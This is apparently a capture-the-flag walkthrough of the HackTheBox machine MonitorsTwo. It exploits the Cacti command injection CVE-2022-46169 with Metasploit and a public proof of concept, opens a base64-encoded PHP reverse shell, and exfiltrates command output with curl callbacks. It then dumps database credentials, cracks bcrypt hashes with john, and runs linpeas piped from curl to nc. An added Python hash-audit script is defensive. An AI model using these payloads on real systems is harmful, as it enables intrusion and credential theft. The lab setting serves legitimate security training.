From the news box, Cacti 1.2.24 was released on Feb 27, 2023!
Anyway, let’s search for some exploits for it…

Cacti v1.2.22 – Remote Command Execution (RCE)
Cacti v1.2.22 – Remote Command Execution (RCE). CVE-2022-46169 . webapps exploit for PHP platform

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/expl]
└─$ wget https://www.exploit-db.com/download/51166                                             
--2023-05-14 15:52:02--  https://www.exploit-db.com/download/51166
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2864 (2.8K) [application/txt]
Saving to: ‘51166’

51166                                              100%[=============================================================================================================>]   2.80K  --.-KB/s    in 0s      

2023-05-14 15:52:03 (32.5 MB/s) - ‘51166’ saved [2864/2864]

                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/expl]
└─$ mv 51166 51166.py
                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/expl]
└─$ ls -la
total 12
drwxr-xr-x 2 in7rud3r in7rud3r 4096 May 14 15:52 .
drwxr-xr-x 3 in7rud3r in7rud3r 4096 May 14 15:51 ..
-rw-r--r-- 1 in7rud3r in7rud3r 2864 May 14 15:52 51166.py
                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/expl]
└─$ python3 51166.py                                            
usage: 51166.py [-h] [-u URL] -p REMOTE_PORT -i REMOTE_IP
51166.py: error: the following arguments are required: -p/--remote_port, -i/--remote_ip

The script doesn’t seem to work and fails. I tried to reproduce the injection manually, but I get an “unauthorized” message, even though the returned HTTP code is 200.
Let’s move on. Another link suggests that there is a module in the Metasploit framework.

Cacti 1.2.22 unauthenticated command injection
Rapid7’s VulnDB is a curated repository of vetted computer software exploits and exploitable vulnerabilities.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/expl]
└─$ msfconsole       
                                                  
     ,           ,
    /                                                                                                                                                                                                   
   ((__---,,,---__))                                                                                                                                                                                     
      (_) O O (_)_________                                                                                                                                                                               
          _ /            |                                                                                                                                                                             
          o_o    M S F   |                                                                                                                                                                             
                  _____  |  *                                                                                                                                                                           
                |||   WW|||                                                                                                                                                                              
                |||     |||                                                                                                                                                                              
                                                                                                                                                                                                         

       =[ metasploit v6.3.14-dev                          ]
+ -- --=[ 2311 exploits - 1206 auxiliary - 412 post       ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can upgrade a shell to a Meterpreter 
session on many platforms using sessions -u 
<session_id>                                                                                                                                                                                             
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/linux/http/cacti_unauthenticated_cmd_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > options

Module options (exploit/linux/http/cacti_unauthenticated_cmd_injection):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HOST_ID                              no        The host_id value to use. By default, the module will try to bruteforce this.
   LOCAL_DATA_ID                        no        The local_data_id value to use. By default, the module will try to bruteforce this.
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                               yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT               8080             yes       The target port (TCP)
   SSL                 false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                              no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI           /                yes       The base path to Cacti
   URIPATH                              no        The URI to use for this exploit (default is random)
   VHOST                                no        HTTP server virtual host
   X_FORWARDED_FOR_IP  127.0.0.1        yes       The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Automatic (Linux Dropper)



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set rhosts http://10.10.11.211/
rhosts => http://10.10.11.211/
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set rport 80
rport => 80
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > set lhost 10.10.14.84
lhost => 10.10.14.84
msf6 exploit(linux/http/cacti_unauthenticated_cmd_injection) > exploit

[*] Started reverse TCP handler on 10.10.14.84:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is Cacti version 1.2.22
[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations
[*] Enumerating local_data_id values for host_id 1
[+] Found exploitable local_data_id 6 for host_id 1
[*] Command Stager progress - 100.00% done (1118/1118 bytes)
[*] Exploit completed, but no session was created.

Nothing, but we have a lot of exploits to try. Next one!

GitHub – sAsPeCt488/CVE-2022-46169: PoC for CVE-2022-46169 – Unauthenticated RCE on Cacti <= 1.2.22
PoC for CVE-2022-46169 – Unauthenticated RCE on Cacti <= 1.2.22 – GitHub – sAsPeCt488/CVE-2022-46169: PoC for CVE-2022-46169 – Unauthenticated RCE on Cacti <= 1.2.22

Let’s check whether the target is vulnerable!

┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.211 - MonitorsTwo (lin)/attack/git/CVE-2022-46169]
└─$ python3 CVE-2022-46169.py -c "curl http://10.10.14.84/" http://10.10.11.211/
[*] Trying for 1 - 100 host ids
[+] Exploit Completed for host_id = 1

And it seems so.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ php -S 10.10.14.84:80
[Sun May 14 16:26:09 2023] PHP 8.2.4 Development Server (http://10.10.14.84:80) started
[Sun May 14 16:29:02 2023] 10.10.11.211:52720 Accepted
[Sun May 14 16:29:02 2023] 10.10.11.211:52720 [404]: GET / - No such file or directory
[Sun May 14 16:29:02 2023] 10.10.11.211:52720 Closing

Really good, let’s find out who I am!

┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.211 - MonitorsTwo (lin)/attack/git/CVE-2022-46169]
└─$ python3 CVE-2022-46169.py -c "curl "http://10.10.14.84/$(whoami)"" http://10.10.11.211/
[*] Trying for 1 - 100 host ids
[+] Exploit Completed for host_id = 1

What I expected!

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ php -S 10.10.14.84:80 
[Sun May 14 16:39:09 2023] PHP 8.2.4 Development Server (http://10.10.14.84:80) started
[Sun May 14 16:40:28 2023] 10.10.11.211:56602 Accepted
[Sun May 14 16:40:28 2023] 10.10.11.211:56602 [404]: GET /www-data - No such file or directory
[Sun May 14 16:40:28 2023] 10.10.11.211:56602 Closing

We can then move on to the reverse shell… listener listening (that’s horrible)…

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444         
listening on [any] 4444 ...

…and attack!
After a lot of reverse shells, I found the right one:

php -r '$sock=fsockopen("10.10.14.84",4444);exec("/bin/bash <&3 >&3 2>&3");'

Which I have to pass base64-encoded!

┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.211 - MonitorsTwo (lin)/attack/git/CVE-2022-46169]
└─$ python3 CVE-2022-46169.py -c "echo 'cGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE0Ljg0Iiw0NDQ0KTtleGVjKCIvYmluL2Jhc2ggPCYzID4mMyAyPiYzIik7Jw==' | base64 -d | sh" http://10.10.11.211/
[*] Trying for 1 - 100 host ids

You can generate your reverse shell in a simple way using this site:

Online – Reverse Shell Generator
Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.

And the shell is served!

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444         
listening on [any] 4444 ...
10.10.11.211: inverse host lookup failed: Unknown host
connect to [10.10.14.84] from (UNKNOWN) [10.10.11.211] 44074
whoami
www-data

It seems I don’t have permission to read the /home folder; let’s look for any clues left in the surroundings before running a session with linpeas. Let’s check the list of the users in the meantime.

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

What? There doesn’t seem to be any user who can log in! There is something strange about this BOX!

I found a SQL script that creates the database for the portal and, looking inside…

[...]
CREATE TABLE user_auth (
  `id` mediumint(8) unsigned NOT NULL auto_increment,
  `username` varchar(50) NOT NULL default '0',
  `password` varchar(256) NOT NULL default '',
  `realm` mediumint(8) NOT NULL default '0',
  `full_name` varchar(100) default '0',
  `email_address` varchar(128) NULL,
[...]
INSERT INTO user_auth VALUES (1,'admin','21232f297a57a5a743894a0e4a801fc3',0,'Administrator','','on','on','on','on','on','on',2,1,1,1,1,'on',-1,-1,'-1','',0,0,0);
INSERT INTO user_auth VALUES (3,'guest','43e9a4ab75570f5b',0,'Guest Account','','on','on','on','on','on',3,1,1,1,1,1,'',-1,-1,'-1','',0,0,0);
[...]

Undecided between a simple hex encoding and an MD5 digest, it was enough for me to search for the string online to discover the very mysterious password of the admin user.

MD5 reverse for 21232f297a57a5a743894a0e4a801fc3
Reverse string for MD5 hash 21232f297a57a5a743894a0e4a801fc3

However, the password must have been changed, as I cannot access the portal. Another interesting file was the config.php in the include folder.

[...]
/*
 * Make sure these values reflect your actual database/host/user/password
 */

$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'db';
$database_username = 'root';
$database_password = 'root';
$database_port     = '3306';
$database_retries  = 5;
$database_ssl      = false;
$database_ssl_key  = '';
$database_ssl_cert = '';
$database_ssl_ca   = '';
$database_persist  = false;

/*
 * When the cacti server is a remote poller, then these entries point to
 * the main cacti server. Otherwise, these variables have no use and
 * must remain commented out.
 */

#$rdatabase_type     = 'mysql';
#$rdatabase_default  = 'cacti';
#$rdatabase_hostname = 'localhost';
#$rdatabase_username = 'cactiuser';
#$rdatabase_password = 'cactiuser';
#$rdatabase_port     = '3306';
#$rdatabase_retries  = 5;
#$rdatabase_ssl      = false;
#$rdatabase_ssl_key  = '';
#$rdatabase_ssl_cert = '';
#$rdatabase_ssl_ca   = '';
[...]

Let’s try to connect to the MySQL server. Unfortunately, I can’t spawn a TTY shell and the mysql client doesn’t respond well interactively, so I have to run each query manually through the client’s -e argument.

$ mysql -h db -u root -p cacti -e "show databases;"
Enter password: root
Database
information_schema
cacti
mysql
performance_schema
sys

Let’s list the tables.

$ mysql -h db -u root -p cacti -e "show tables"
Enter password: root
Tables_in_cacti
aggregate_graph_templates
[...]
sessions
settings
settings_tree
settings_user
settings_user_group
sites
[...]
user_auth
user_auth_cache
user_auth_group
user_auth_group_members
user_auth_group_perms
user_auth_group_realm
user_auth_perms
user_auth_realm
user_domains
user_domains_ldap
user_log
[...]

And the contents of some interesting tables.

$ mysql -h db -u root -p cacti -e "select * from user_auth;"
Enter password: root
id      username        password        realm   full_name       email_address   must_change_password    password_change show_tree       show_list       show_preview    graph_settings  login_opts      policy_graphs    policy_trees    policy_hosts    policy_graph_templates  enabled lastchange      lastlogin       password_history        locked  failed_attempts lastfail        reset_perms
1       admin   $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC    0       Jamie Thompson  admin@monitorstwo.htb           on      on      on      on      on      2       1       1       11       on      -1      -1      -1              0       0       663348655
3       guest   43e9a4ab75570f5b        0       Guest Account           on      on      on      on      on      3       1       1       1       1       1               -1      -1      -1              00       0
4       marcus  $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C    0       Marcus Brune    marcus@monitorstwo.htb                  on      on      on      on      1       1       1       11       on      -1      -1              on      0       0       2135691668

Well, the admin user changed his password and a new user appeared in the list… we have a couple of interesting passwords to try and crack.

Save the passwords into a file.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/crk]
└─$ cat pwd.hash 
admin:$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
marcus:$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

Let’s have hashcat try to identify the hashing algorithm.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/crk]
└─$ hashcat pwd.hash                                                
hashcat (v6.2.6) starting in autodetect mode

/sys/class/hwmon/hwmon4/temp1_input: No such file or directory

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-penryn-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1406/2876 MB (512 MB allocatable), 2MCU

No hash-mode matches the structure of the input hash.

Started: Mon May 15 15:38:03 2023
Stopped: Mon May 15 15:38:15 2023

Mmmm, not so lucky today. Let’s try with my friend john!

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/crk]
└─$ john pwd.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey      (marcus)     

Definitely better.
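As an added example (not Cacti’s code and not from the original post), here is a Python audit of the two user_auth dumps shown above: it classifies each stored hash by structure, the same distinction john made where hashcat’s autodetect gave up (bcrypt with cost 10, i.e. 1024 iterations), flags the legacy unsalted MD5 and the unrecognised 16-character guest value, and checks MD5 entries against a small constructed candidate list, which is what the online lookup did for the admin row from the install script. The candidate list and the cost threshold are assumptions of this example.

```python
"""Audit a dump of Cacti's user_auth.password column for weak or legacy hashes.

Added example for this walkthrough (not Cacti's code and not the author's).
"""
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample data: the hashes exactly as they appear in the walkthrough,
# first from the SQL install script, then from the live user_auth table.
INSTALL_SCRIPT_ROWS: Dict[str, str] = {
    "admin": "21232f297a57a5a743894a0e4a801fc3",
    "guest": "43e9a4ab75570f5b",
}
LIVE_TABLE_ROWS: Dict[str, str] = {
    "admin": "$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC",
    "guest": "43e9a4ab75570f5b",
    "marcus": "$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C",
}

# bcrypt modular-crypt format: $2y$<cost>$<22-char salt><31-char hash>
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(\d{2})\$[./A-Za-z0-9]{53}$")
# Unsalted MD5 hex digest (Cacti's legacy scheme, as in the install script)
MD5_RE = re.compile(r"^[0-9a-f]{32}$")

# Assumption: a local policy threshold for this audit, not a Cacti setting.
MIN_ACCEPTABLE_BCRYPT_COST = 10


@dataclass
class HashInfo:
    username: str
    scheme: str                 # "bcrypt", "md5" or "unknown"
    iterations: Optional[int]   # bcrypt: 2**cost; md5: 1; unknown: None
    weak: bool
    reason: str


def classify_hash(username: str, stored: str) -> HashInfo:
    """Identify the hashing scheme from the stored string's structure alone."""
    m = BCRYPT_RE.match(stored)
    if m:
        cost = int(m.group(1))
        iterations = 2 ** cost  # what john prints as "Cost 1 (iteration count)"
        weak = cost < MIN_ACCEPTABLE_BCRYPT_COST
        return HashInfo(username, "bcrypt", iterations, weak,
                        f"bcrypt cost {cost} ({iterations} iterations)")
    if MD5_RE.match(stored):
        return HashInfo(username, "md5", 1, True,
                        "unsalted MD5: one lookup in a precomputed table recovers common passwords")
    return HashInfo(username, "unknown", None, True,
                    f"unrecognised format ({len(stored)} chars): not a modern password hash")


def md5_lookup(stored: str, candidates: List[str]) -> Optional[str]:
    """Return the candidate whose MD5 digest equals the stored value, if any."""
    for candidate in candidates:
        if hashlib.md5(candidate.encode("utf-8")).hexdigest() == stored.lower():
            return candidate
    return None


def audit(rows: Dict[str, str], candidates: List[str]) -> List[str]:
    """Produce one finding line per account whose stored hash needs attention."""
    findings = []
    for username, stored in rows.items():
        info = classify_hash(username, stored)
        if info.scheme == "md5":
            hit = md5_lookup(stored, candidates)
            detail = f"recovered as {hit!r}" if hit else "not in candidate list"
            findings.append(f"{username}: legacy MD5 hash, {detail}; force a password reset")
        elif info.weak:
            findings.append(f"{username}: {info.reason}; needs review")
    return findings


if __name__ == "__main__":
    # Constructed candidate list standing in for the online lookup / wordlist.
    wordlist = ["password", "admin", "cacti", "guest"]
    for label, rows in (("install script", INSTALL_SCRIPT_ROWS), ("live table", LIVE_TABLE_ROWS)):
        print(f"-- {label} --")
        for line in audit(rows, wordlist):
            print(line)
```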


Even though he’s a portal user, he seems to have trouble logging in there, but it’s much better to use him to log in over SSH!

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ ssh marcus@10.10.11.211                                                                                                        
The authenticity of host '10.10.11.211 (10.10.11.211)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.211' (ED25519) to the list of known hosts.
marcus@10.10.11.211's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 15 May 2023 09:02:46 PM UTC

  System load:                      0.0
  Usage of /:                       64.1% of 6.73GB
  Memory usage:                     34%
  Swap usage:                       0%
  Processes:                        292
  Users logged in:                  1
  IPv4 address for br-60ea49c21773: 172.18.0.1
  IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.211
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:ff04

  => There is 1 zombie process.


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


You have mail.
Last login: Mon May 15 20:40:13 2023 from 10.10.14.169
marcus@monitorstwo:~$ cat user.txt 
2******************************a

Thus obtaining the user flag! At first glance, it seems like I can’t do much with this user, so let’s download linpeas and make it available from our native php web server.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/upld]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20230514-85dabdc9/linpeas.sh                               
--2023-05-16 15:36:42--  https://github.com/carlospolop/PEASS-ng/releases/download/20230514-85dabdc9/linpeas.sh
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/1f1f0080-bb74-490c-ac12-16e66dcb0699?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230516%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230516T193601Z&X-Amz-Expires=300&X-Amz-Signature=267efcd94629b388ffc0decf9f86725f34b28929ad55df95f9a745fcb504ef9d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2023-05-16 15:36:43--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/1f1f0080-bb74-490c-ac12-16e66dcb0699?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230516%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230516T193601Z&X-Amz-Expires=300&X-Amz-Signature=267efcd94629b388ffc0decf9f86725f34b28929ad55df95f9a745fcb504ef9d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 835306 (816K) [application/octet-stream]
Saving to: ‘linpeas.sh’

linpeas.sh                                         100%[=============================================================================================================>] 815.73K  2.89MB/s    in 0.3s    

2023-05-16 15:36:43 (2.89 MB/s) - ‘linpeas.sh’ saved [835306/835306]

                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/upld]
└─$ php -S 10.10.14.69:80
[Tue May 16 15:37:25 2023] PHP 8.2.4 Development Server (http://10.10.14.69:80) started

Let’s get ready to receive the scan from the BOX.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/dwnl]
└─$ nc -lp 4445 | tee lpeasout.file

And we initiate the attack on the remote machine without leaving any traces.

curl http://10.10.14.69/linpeas.sh | sh | nc 10.10.14.69 4445

Let’s look at the most interesting points of the linpeas scan.

[...]
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                                            
tcp        0      0 127.0.0.1:35077         0.0.0.0:*               LISTEN      -                                                                                                                        
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
[...]
                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════                                                                                                                       
                      ╚════════════════════════════════════╝                                                                                                                                             
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                         
strings Not Found                                                                                                                                                                                        
-rwsr-xr-- 1 root messagebus 51K Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                                                                
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 23K Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 463K Mar 30  2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 55K Feb  7  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 163K Apr  4 11:56 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 87K Nov 29 11:53 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K Feb  7  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 67K Nov 29 11:53 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 52K Nov 29 11:53 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 84K Nov 29 11:53 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Nov 29 11:53 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb  7  2022 /usr/bin/su

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                         
-rwxr-sr-x 1 root shadow 43K Feb  2 09:22 /usr/sbin/pam_extrausers_chkpwd                                                                                                                                
-rwxr-sr-x 1 root shadow 43K Feb  2 09:22 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 15K Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root tty 35K Feb  7  2022 /usr/bin/wall
-rwxr-sr-x 1 root ssh 343K Mar 30  2022 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K Nov 29 11:53 /usr/bin/expiry
-rwxr-sr-x 1 root tty 15K Mar 30  2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 83K Nov 29 11:53 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root crontab 43K Feb 13  2020 /usr/bin/crontab
[...]

This time I don’t seem to have found much of interest in the linpeas session, apart from a port open locally; we will investigate this shortly. Let’s try to take a look at the suggested CVEs, even if, by now, I know that most of the time they are false positives.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/dwnl]
└─$ grep -i "CVE-" lpeasout.file                   
[+] [CVE-2022-2586] nft_object UAF
[+] [CVE-2021-4034] PwnKit
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)

If I really can’t find anything else, I’ll come back to it.

marcus@monitorstwo:~$ curl http://127.0.0.1:35077/ -v
*   Trying 127.0.0.1:35077...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 35077 (#0)
> GET / HTTP/1.1
> Host: 127.0.0.1:35077
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 404 Not Found
< Date: Tue, 16 May 2023 20:15:22 GMT
< Content-Length: 19
